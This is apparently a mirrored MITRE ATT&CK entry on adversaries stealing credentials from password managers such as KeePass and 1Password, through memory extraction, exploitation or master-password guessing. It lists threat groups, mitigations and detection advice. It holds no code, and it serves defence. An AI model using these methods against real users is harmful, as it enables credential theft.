Credentials from Password Stores: Password Managers
Other sub-techniques of Credentials from Password Stores (5)
Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019) Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via Exploitation for Credential Access.(Citation: NVD CVE-2019-3610) Adversaries may also try brute forcing via Password Guessing to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
Procedure Examples |
|
Name | Description |
---|---|
During Operation Wocao, threat actors accessed and collected credentials from password managers.(Citation: FoxIT Wocao December 2019) |
|
Threat Group-3390 |
Threat Group-3390 obtained a KeePass database from a compromised host.(Citation: Trend Micro DRBControl February 2020) |
Fox Kitten |
Fox Kitten has used scripts to access credential information from the KeePass database.(Citation: CISA AA20-259A Iran-Based Actor September 2020) |
MarkiRAT |
MarkiRAT can gather information from the Keepass password manager.(Citation: Kaspersky Ferocious Kitten Jun 2021) |
Proton |
Proton gathers credentials in files for 1password.(Citation: objsee mac malware 2017) |
TrickBot |
TrickBot can steal passwords from the KeePass open source password manager.(Citation: Cyberreason Anchor December 2019) |
Operation Wocao |
Operation Wocao has accessed and collected credentials from password managers.(Citation: FoxIT Wocao December 2019) |
Mitigations |
|
Mitigation | Description |
---|---|
Update Software |
Perform regular software updates to mitigate exploitation risk. |
Software Configuration |
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates. |
Password Policies |
Set and enforce secure password policies for accounts. |
Detection
Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. Consider monitoring file reads surrounding known password manager applications.
References
- Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.
- Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.
- National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.
- Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, 2021.
- Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.
- ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.
- CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.
- Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
- GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.
- Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019.
- Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.
Связанные риски
Каталоги
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.